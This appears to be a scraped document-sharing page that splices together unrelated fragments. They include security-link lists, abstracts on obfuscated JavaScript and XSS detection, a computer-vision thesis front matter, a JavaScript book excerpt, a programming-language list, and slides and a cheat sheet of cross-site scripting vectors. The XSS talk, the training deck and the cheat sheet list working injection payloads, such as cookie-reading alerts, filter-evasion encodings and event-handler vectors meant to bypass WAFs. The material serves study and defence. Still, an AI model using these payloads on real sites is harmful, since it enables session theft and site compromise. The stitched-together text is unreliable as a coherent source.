Automatic Identification of Obfuscated JavaScript Using Machine Learning

Total Page:16

File Type:pdf, Size:1020Kb


Recommended publications


Security Tools Mind Map Best Temporary Mailbox (Updates)

Security tools mind map
Best temporary mailboxes (Updates): for self-testing and other specific purposes; can be used for test registrations or to guard against social engineering.
➖https://www.guerrillamail.com/en/
➖https://10minutemail.com
➖https://www.trash-mail.com/inbox/
➖https://www.mailinator.com
➖http://www.yopmail.com/en
➖https://generator.email
➖https://en.getairmail.com
➖http://www.throwawaymail.com/en
➖https://maildrop.cc
➖https://owlymail.com/en
➖https://www.moakt.com
➖https://tempail.com
➖http://www.yopmail.com
➖https://temp-mail.org/en
➖https://www.mohmal.com Best options
➖http://od.obagg.com Best options
➖http://onedrive.readmail.net Best options
➖http://xkx.me Best options
➖https://www.emailondeck.com
➖https://smailpro.com
➖https://anonbox.net
➖https://M.kuku.lu
A few tools for:
• Port Forwarding Tester
• What is My IP Address
• Network Location Tools
• Visual Trace Route Tools
• Phone Number Geolocator
• Reverse E-mail Lookup Tool
• Reverse IP Domain Check
• WHOIS Lookup Tools
https://www.yougetsignal.com/
DNS MAP https://github.com/makefu/dnsmap/
Stanford Free Web Security Course https://web.stanford.edu/class/cs253/
Top 10 web hacking techniques of 2019 https://portswigger.net/research/top-10-web-hacking-techniques-of-2019
Testing for WebSockets security vulnerabilities https://portswigger.net/web-security/websockets
Windows grep Software to Search (and Replace) through Files and Folders on Your PC and Network https://www.powergrep.com/
Reflected XSS on http://microsoft.com subdomains https://medium.com/bugbountywriteup/reflected-xss-on-microsoft-com-subdomains-

Browser Instrumentation for JavaScript Code Analysis

Under the DOM: Browser Instrumentation for JavaScript Code Analysis (original title: Under the DOM : Instrumentation de navigateurs pour l’analyse de code JavaScript) Erwan Abgrall1,2 and Sylvain Gombault2 [email protected] [email protected] 1 DGA-MI 2 IMT Atlantique - SRCD
Abstract. Attackers increasingly use dynamic languages to launch their attacks. In "watering hole" attacks, where a link to a booby-trapped website is sent to a victim, or when a web application is compromised to host an "exploit kit", attackers often use heavily obfuscated JavaScript code. Such code is tied closely to the browser through various anti-analysis techniques in order to block its execution inside honeyclients. This article explains where these techniques come from and how to turn an off-the-shelf web browser into a JavaScript analysis tool that can defeat some of them and so make our work easier.
1 Introduction. This article aims to introduce the reader to the world of JavaScript deobfuscation and to propose a new approach to the problem in the context of analyzing malicious sites, more commonly called "exploit kits". It goes without saying that understanding the basic mechanisms of the JavaScript language is a prerequisite. Readers who wish to become familiar with it can read the excellent Eloquent JavaScript (footnote 3). Of course, malicious code of any kind must be analyzed in an environment appropriate to the risks involved (footnotes 4 and 5). Finally, for practice, a set of malicious sites potentially useful for research work is available online (footnote 6).

Esoteric XSS Payloads Day 2, Track 2, 12:00

ESOTERIC XSS PAYLOADS
c0c0n2016 @riyazwalikar @wincmdfu
RIYAZ WALIKAR
Chief Offensive Security Officer @Appsecco. Security evangelist, leader for null Bangalore and OWASP chapters. Trainer/Speaker: BlackHat, defcon, nullcon, c0c0n, OWASP AppSec USA. Twitter: @riyazwalikar and @wincmdfu. http://ibreak.software
WHAT IS THIS TALK ABOUT?
Quick contexts. Uncommon XSS vectors.
WHAT ARE INJECTION CONTEXTS?
Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page would depend on the context in which the browser tries to interpret the user input. (Lavakumar Kuppan, IronWASP)
3 MOST COMMON INJECTION CONTEXTS
HTML context. HTML Element context. Script context.
HTML CONTEXT
<html> <body> Welcome user_tainted_input! </body> </html>
HTML ELEMENT CONTEXT
<html> <body> Welcome bob! <input id="user" name="user" value=user_tainted_input> </body> </html>
SCRIPT CONTEXT
<html> <body> Welcome bob! <script> var a = user_tainted_input; </script> </body> </html>
Common vectors?
<script>alert(document.cookie)</script>
<svg onload=alert(document.cookie)>
<input onfocus=alert(document.cookie) autofocus>
Multiple ways of representation
document.cookie
document['cookie']
document['coo'+'kie']
eval('doc'+'ument')['coo'+ 'kie']
Autoscrolling the page
<body onscroll=alert(1)> <br> <br> <br> <br> <br> <br> ... <br> <br> <br> <br> <br> <input autofocus>
New HTML Elements
<video><source onerror="alert(1)">
<details open ontoggle="alert(1)"> <!-- Chrome only -->
Using
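The "multiple ways of representation" slide suggests why a filter that searches for one literal spelling tends to miss equivalent ones. The following is a minimal sketch of that idea, written to run under Node.js. `fakeDocument` is a hypothetical stand-in for the browser's `document` object, and `naiveFilterBlocks` is an illustrative blocklist check; neither comes from the talk.

```javascript
// Hypothetical stand-in for the browser's `document` object (assumption: run under Node.js).
const fakeDocument = { cookie: "session=abc123" };

// Property-access spellings from the slide, applied to the stand-in object.
const accessForms = {
  dot: (doc) => doc.cookie,
  bracket: (doc) => doc["cookie"],
  concatenated: (doc) => doc["coo" + "kie"],
};

// Illustrative, deliberately weak filter: blocks input only if it contains the literal text.
function naiveFilterBlocks(payload) {
  return payload.includes("document.cookie");
}

// Payload strings built from the spellings listed on the slide.
const payloads = [
  "alert(document.cookie)",
  "alert(document['cookie'])",
  "alert(document['coo'+'kie'])",
  "alert(eval('doc'+'ument')['coo'+'kie'])",
];

// Every spelling reads the same property value.
const values = Object.values(accessForms).map((read) => read(fakeDocument));

// Only payloads that contain the exact literal are caught by the filter.
const blocked = payloads.filter(naiveFilterBlocks);

console.log(values);
console.log(blocked);
```

In this sketch only the first payload is caught, which is one reason context-aware output encoding is generally preferred over matching known strings.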

Automated XSS Vulnerability Detection Through Context Aware Fuzzing and Dynamic Analysis

The approved original version of this diploma or master thesis is available at the main library of the Vienna University of Technology. http://www.ub.tuwien.ac.at/eng
Automated XSS Vulnerability Detection Through Context Aware Fuzzing and Dynamic Analysis. DIPLOMA THESIS submitted in partial fulfillment of the requirements for the degree of Diplom-Ingenieur in Software Engineering & Internet Computing by Tobias Fink, BSc, Registration Number 1026737, to the Faculty of Informatics at the TU Wien. Advisor: Privatdoz. Mag.rer.soc.oec. Dipl.-Ing. Dr.techn. Edgar Weippl. Assistance: Dipl.-Ing. Dr.techn. Georg Merzdovnik, BSc. Vienna, 21st June, 2018. Tobias Fink, Edgar Weippl. Technische Universität Wien, A-1040 Wien, Karlsplatz 13, Tel. +43-1-58801-0, www.tuwien.ac.at
Declaration of Authorship. Tobias Fink, BSc, Windmühlgasse 22/20, 1060 Wien. I hereby declare that I have written this thesis independently, that I have fully cited the sources and aids used, and that I have clearly marked as borrowed, with an indication of the source, all parts of the thesis (including tables, maps and figures) that are taken from other works or from the Internet, whether verbatim or in substance.

Studying Minified and Obfuscated Code in the Web

Anything to Hide? Studying Minified and Obfuscated Code in the Web. Philippe Skolka, Cristian-Alexandru Staicu, Michael Pradel. Department of Computer Science, TU Darmstadt.
ABSTRACT. JavaScript has been used for various attacks on client-side web applications. To hinder both manual and automated analysis from detecting malicious scripts, code minification and code obfuscation may hide the behavior of a script. Unfortunately, little is currently known about how real-world websites use such code transformations. This paper presents an empirical study of obfuscation and minification in 967,149 scripts (424,023 unique) from the top 100,000 websites. The core of our study is a highly accurate (95%-100%) neural network-based classifier that we train to identify whether obfuscation or minification have been applied and if yes, using what tools. We find that code transformations are very widespread,
1 INTRODUCTION. JavaScript has become the dominant programming language for client-side web applications and nowadays is used in the vast majority of all websites. The popularity of the language makes JavaScript an attractive target for various kinds of attacks. For example, cross-site scripting attacks try to inject malicious JavaScript code into websites [14, 17, 28]. Other attacks aim at compromising the underlying browser [6, 7] or extensions installed in a browser [11, 12], or they abuse particular web APIs [19, 26, 30]. An effective way to hide the maliciousness of JavaScript code are code transformations that preserve the overall behavior of a script while making it harder to understand and analyze.

Statically Detecting JavaScript Obfuscation and Minification Techniques in the Wild

Statically Detecting JavaScript Obfuscation and Minification Techniques in the Wild. Marvin Moog∗†, Markus Demmel∗, Michael Backes†, and Aurore Fass†. ∗Saarland University †CISPA Helmholtz Center for Information Security: fbackes, [email protected]
Abstract: JavaScript is both a popular client-side programming language and an attack vector. While malware developers transform their JavaScript code to hide its malicious intent and impede detection, well-intentioned developers also transform their code to, e.g., optimize website performance. In this paper, we conduct an in-depth study of code transformations in the wild. Specifically, we perform a static analysis of JavaScript files to build their Abstract Syntax Tree (AST), which we extend with control and data flows. Subsequently, we define two classifiers, benefitting from AST-based features, to detect transformed samples along with specific transformation techniques. Besides malicious samples, we find that transforming code is increasingly popular on Node.js libraries and client-side JavaScript, with, e.g., 90% of Alexa Top 10k websites containing a transformed script.
[...] inherently different objectives, these transformations leave different traces in the source code syntax. In particular, the Abstract Syntax Tree (AST) represents the nesting of programming constructs. Therefore, regular (meaning non-transformed) JavaScript has a different AST than transformed code. Specifically, previous studies leveraged differences in the AST to distinguish benign from malicious JavaScript [5], [9], [14], [15]. Still, they did not discuss if their detectors confounded transformations with maliciousness or why they did not. In particular, there are legitimate reasons for well-intentioned developers to transform their code (e.g., performance improvement), meaning that code transformations are
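The observation that transformed code leaves different traces in the source can be illustrated with a much simpler stand-in. The sketch below does not use AST-based features or a trained classifier as the abstract describes; it swaps in plain lexical counts and hand-picked thresholds. The feature names, the thresholds, and the two sample scripts are all assumptions made for illustration.

```javascript
// Illustrative lexical features (assumed for this sketch, not the paper's AST-based features).
function lexicalFeatures(source) {
  const lines = source.split("\n");
  const whitespace = (source.match(/\s/g) || []).length;
  // Crude tokenization: keywords are counted as identifiers too.
  const identifiers = source.match(/[A-Za-z_$][A-Za-z0-9_$]*/g) || [];
  const shortIdentifiers = identifiers.filter((name) => name.length <= 2).length;
  // Hex and Unicode escapes are common in string-obfuscated code.
  const escapes = (source.match(/\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}/g) || []).length;
  return {
    avgLineLength: source.length / lines.length,
    whitespaceRatio: source.length ? whitespace / source.length : 0,
    shortIdentifierRatio: identifiers.length ? shortIdentifiers / identifiers.length : 0,
    escapeCount: escapes,
  };
}

// Hypothetical hand-picked thresholds; a real classifier would learn them from labeled data.
function looksTransformed(features) {
  return (
    features.whitespaceRatio < 0.1 ||
    features.shortIdentifierRatio > 0.5 ||
    features.escapeCount > 0
  );
}

// Two made-up samples: a readable function and a minified equivalent.
const regular = [
  "function addNumbers(first, second) {",
  "  const total = first + second;",
  "  return total;",
  "}",
].join("\n");
const minified = "function a(b,c){var d=b+c;return d}";

console.log(looksTransformed(lexicalFeatures(regular)));
console.log(looksTransformed(lexicalFeatures(minified)));
```

Counts like these are cheap to compute but easy to fool, which is one motivation for the structural features the abstract mentions.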

Interactive Computer Vision Through the Web

Submitted for the degree of DOCTORATE OF THE UNIVERSITÉ DE TOULOUSE. Awarded by: Institut National Polytechnique de Toulouse (Toulouse INP). Discipline or specialty: Computer Science and Telecommunications. Presented and defended by: Mr. MATTHIEU PIZENBERG on Friday, 28 February 2020. Title: Interactive Computer Vision through the Web. Doctoral school: Mathématiques, Informatique, Télécommunications de Toulouse (MITT). Research unit: Institut de Recherche en Informatique de Toulouse (IRIT). Thesis supervisors: Mr. VINCENT CHARVILLAT, Mr. AXEL CARLIER. Reviewers: Mr. MATHIAS LUX, ALPEN ADRIA UNIVERSITAT; Ms. VERONIQUE EGLIN, INSA LYON. Jury members: Ms. GÉRALDINE MORIN, TOULOUSE INP, President; Mr. AXEL CARLIER, TOULOUSE INP, Member; Mr. CHRISTOPHE DEHAIS, ENTREPRISE FITTINGBOX, Member; Mr. OGE MARQUES, FLORIDA ATLANTIC UNIVERSITY, Member; Mr. VINCENT CHARVILLAT, TOULOUSE INP, Member.
Acknowledgments. First I’d like to thank my advisors Vincent and Axel without whom this PhD would not have been possible. I would also like to thank Véronique and Mathias for reviewing this manuscript, as well as the other members of the jury, Oge, Géraldine and Christophe for your attention, remarks and interesting discussions during the defense. Again, a special thank you Axel for all that you’ve done, throughout this long period and even before it started. I haven’t been on the easiest path toward completion of this PhD but you’ve always been there to help me continue being motivated and that’s what mattered most! Wanting to begin a PhD certainly isn’t a one-time moment, but for me, the feeling probably started during my M1 internship. I was working in the VORTEX research team (now REVA) on a project with Yvain and Jean-Denis and it was great! Yet “I don’t think so” was more or less what I kept answering to my teachers when they would ask if I wished to start a PhD at that time.

Professionell entwickeln mit JavaScript – Design, Patterns, Praxistipps (450 pages, paperback, March 2015, 34.90 euros, ISBN 978-3-8362-2379-9)

Knowing how it's done. Sample chapter. In his book, Philip Ackermann tells you everything about the professional use of JavaScript in modern web development. This sample chapter explains the functional aspects of JavaScript. You also get the book's complete table of contents and index. Chapter 2: "Functions and Functional Aspects". Philip Ackermann, Professionell entwickeln mit JavaScript – Design, Patterns, Praxistipps, 450 pages, paperback, March 2015, 34.90 euros, ISBN 978-3-8362-2379-9, www.rheinwerk-verlag.de/3365
Chapter 2: Functions and Functional Aspects. The functional aspects of JavaScript form the basis of many of the language's design patterns, which is reason enough to address the topic right at the start. One of the most important properties of JavaScript is that it enables both functional and object-oriented programming. This chapter and the next briefly introduce the two programming paradigms and then explain in detail how each is applied in JavaScript. I deliberately start with the functional aspects because many of the design patterns described in Chapter 3, "Object-Oriented Programming with JavaScript", build on these functional foundations. The aim of this chapter is not to turn you into a functional programming pro. Don't get me wrong, but that would be rather ambitious in just under 60 pages. Rather, my aim is to ...

Giant List of Programming Languages

Giant List of Programming Languages
This list is almost like a history lesson; some of the languages below are over half a century old. It is by no means exhaustive, but there are just so many of them. A large chunk of these languages are no longer active or supported. We added links to the official site where possible, otherwise linked to a knowledgeable source or manual. If there is a better link for any of them, please let us know or check out this larger list.
1. 51-FORTH https://codelani.com/languages/51forth
2. 1C:Enterprise Script https://1c-dn.com/1c_enterprise/1c_enterprise_script
3. 4DOS https://www.4dos.info
4. A+ http://www.aplusdev.org
5. A++ https://www.aplusplus.net
6. A# (Axiom) http://axiom-developer.org
7. A-0 System No live site
8. ABCL/c+ No live site
9. ABAP https://www.sap.com/community/topics/abap
10. ABC https://homepages.cwi.nl/~steven/abc
11. ABC ALGOL No live site
12. ABSET http://hopl.info/showlanguage.prx?exp=356
13. Absys No live site
14. ACC No live site
15. Accent No live site
16. Accent R http://nissoftware.net/accentr_home
17. ACL2 http://www.cs.utexas.edu/users/moore/acl2
18. ActionScript https://www.adobe.com/devnet/actionscript
19. ActiveVFP https://archive.codeplex.com/?p=activevfp
20. Actor No live site
21. Ada https://www.adaic.org
22. Adenine http://www.ifcx.org/attach/Adenine
23. ADMB http://www.admb-project.org
24. Adobe ColdFusion https://www.adobe.com/products/coldfusion-family
25.

Advanced Cross Site Scripting and CSRF Aims

Advanced Cross Site Scripting And CSRF
Aims
● DOM Based XSS
● Protection techniques
● Filter evasion techniques
● CSRF / XSRF
Me
● Tom Hudson / @TomNomNom
● Technical Consultant / Trainer at Sky Betting & Gaming
● Occasional bug hunter
● I love questions; so ask me questions :)
Don’t Do Anything Stupid
● Never do anything without explicit permission
● The University cannot and will not defend you if you attack live websites
● We provide environments for you to hone your skills
Refresher: The Goal of XSS
● To execute JavaScript in the context of a website you do not control
● ...usually in the context of a browser you don’t control either.
Refresher: Reflected XSS
● User input from the request is outputted in a page unescaped
GET /?user=<script>alert(document.cookie)</script> HTTP/1.1
...
<div>User: <script>alert(document.cookie)</script></div>
Refresher: Stored XSS
● User input from a previous request is outputted in a page unescaped
POST /content HTTP/1.1
content=<script>alert(document.cookie)</script>
...time passes...
GET /content HTTP/1.1
...
<div><script>alert(document.cookie)</script></div>
The DOM (Document Object Model)
● W3C specification for HTML (and XML)
● A model representing the structure of a document
● Allows scripts (usually JavaScript) to manipulate the document
● The document is represented by a tree of nodes
○ The topmost node is called document
○ Nodes have children
● Hated by web developers everywhere
Manipulating the DOM
document.children[0].innerHTML = "<h1>OHAI!</h1>";
var header = document.getElementById('main-header');
header.addEventListener('click', function(){ alert(1); });
DOM XSS
● User requests an attacker-supplied URL
● The response does not contain the attacker’s script*
● The user’s web browser still executes the attacker’s script
● How?!
*It might :)
How?!
● Client-side JavaScript accesses and manipulates the DOM
● User input is taken directly from the browser
● The server might never even see the payload
○ E.g.
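The reflected XSS refresher above turns on user input being written into the page unescaped. As a hedged illustration of the basic countermeasure, the sketch below escapes HTML metacharacters before building the same `<div>User: ...</div>` fragment. `escapeHtml` and `renderUser` are hypothetical helper names, and the approach covers only the HTML body context, not attribute or script contexts.

```javascript
// Minimal HTML-escaping helper for the HTML body context (a sketch, not a complete defense).
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;") // must run first so later entities are not double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical page fragment mirroring the reflected XSS example.
function renderUser(user) {
  return "<div>User: " + escapeHtml(user) + "</div>";
}

const payload = "<script>alert(document.cookie)</script>";
const html = renderUser(payload);

// The payload is now inert text rather than a script element.
console.log(html);
```

Escaping on output, at the point where the value enters the page, keeps the stored or reflected data unchanged while preventing the browser from parsing it as markup.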

TaintJSec: A Static Taint Analysis Method for JavaScript Code to Detect Sensitive Data Leakage / Alexandre Braga Damasceno

EXECUTIVE BRANCH, MINISTRY OF EDUCATION, UNIVERSIDADE FEDERAL DO AMAZONAS, INSTITUTO DE COMPUTAÇÃO, GRADUATE PROGRAM IN INFORMATICS. ALEXANDRE BRAGA DAMASCENO. TAINTJSEC: A STATIC TAINT ANALYSIS METHOD FOR JAVASCRIPT CODE TO DETECT SENSITIVE DATA LEAKAGE (original title: TaintJSec: Um Método de Análise Estática de Marcação em Código JavaScript para Detecção de Vazamento de Dados Sensíveis). Manaus - Amazonas, 2017.
Dissertation submitted to the Graduate Program in Informatics of the Instituto de Computação of the Universidade Federal do Amazonas in partial fulfillment of the requirements for the degree of Master in Informatics. Advisor: Eduardo J. P. Souto. © 2017, Alexandre Braga Damasceno. All rights reserved.
Catalog record: Damasceno, Alexandre Braga. D155t. TaintJSec: Um Método de Análise Estática de Marcação em Código JavaScript para Detecção de Vazamento de Dados Sensíveis / Alexandre Braga Damasceno. Manaus - Amazonas, 2017. xxi, 129 leaves: color ill.; 31 cm. Dissertation (master's), Universidade Federal do Amazonas. Advisor: Eduardo J. P. Souto. 1. Information leakage. 2. Sensitive data. 3. JavaScript. 4. TaintJSec. 5. Static analysis. I. Title. CDU 004.
I dedicate this dissertation to my parents, Raimundo Nonato Damasceno and Sandra Maria Braga Damasceno, who never spared any effort to give me a good education and who taught me from an early age how important studying is in my life.
Acknowledgments. First, I thank and praise the God of Abraham, Isaac and Jacob, who is also my God, for giving me the strength and courage to face the tribulations that arose in my life during the course but were not enough to prevent this victory. I want to thank my family, my safe harbor, who always supported me in my studies and never let me lose heart in the face of challenges.



Cross-Site Scripting (XSS) Cheat Sheet

Cross-site scripting (XSS) cheat sheet
This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated in 2020. Last updated: Fri, 26 Jun 2020 13:02:50 +0000.
Table of contents
Event handlers
Event handlers that do not require user interaction
Event: onactivate. Description: Fires when the element is activated. Code: <xss id=x tabindex=1 onactivate=alert(1)></xss>
Event: onafterprint. Description: Fires after the page is printed. Code: <body onafterprint=alert(1)>
Event: onafterscriptexecute. Description: Fires after script is executed. Code: <xss onafterscriptexecute=alert(1)><script>1</script>
Event: onanimationcancel. Description: Fires when a CSS animation cancels. Code: <style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><xss id=x style="position:absolute;" onanimationcancel="alert(1)"></xss>
Event: onanimationend. Description: Fires when a CSS animation ends. Code: <style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
Event: onanimationiteration. Description: Fires when a CSS animation repeats. Code: <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
Event: onanimationstart. Description: Fires when a CSS animation starts. Code: <style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>